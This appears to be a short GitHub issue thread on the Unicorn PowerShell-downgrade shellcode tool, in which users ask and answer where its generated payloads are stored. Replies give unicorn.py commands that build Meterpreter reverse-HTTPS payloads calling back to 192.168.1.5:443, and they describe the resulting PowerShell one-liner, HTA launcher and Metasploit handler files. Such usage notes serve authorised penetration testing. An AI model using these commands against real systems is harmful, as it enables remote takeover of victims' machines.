This is a dumb question but, Where are my payload located

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

https://www.trustedsec.com

Other

3.74k stars 817 forks source link

This is a dumb question but, Where are my payload located #97

Closed r3x07 closed 5 years ago

r3x07 commented 5 years ago

i want to know the place my payloads are located

myexploit commented 5 years ago

Run the PS Example python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
This creates two files one named powershell_attack.txt this contains the PS one liner payload, and the second file named unicorn.rc this contains the syntax for the MSF windows/meterpreter/reverse_https handler.

myexploit commented 5 years ago

If you opt for the HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta it creates a folder titled hta_attack which has three files created and stored to it, index.html, Launcher.hta and unicorn.rc, Launcher.hta contains the payload, index.html references and launches Launcher.hta, and unicorn.rc again is your MSF handler.

r3x07 commented 5 years ago

Wait, so it means it only works with reverse_https, but not reverse_tcp, right?

myexploit commented 5 years ago

Not sure if honest, I only ever used it with reverse_https, sorry.

r3x07 commented 5 years ago

trustedsec commented 5 years ago

Reverse_tcp is fine as well. Any metasploit payload really.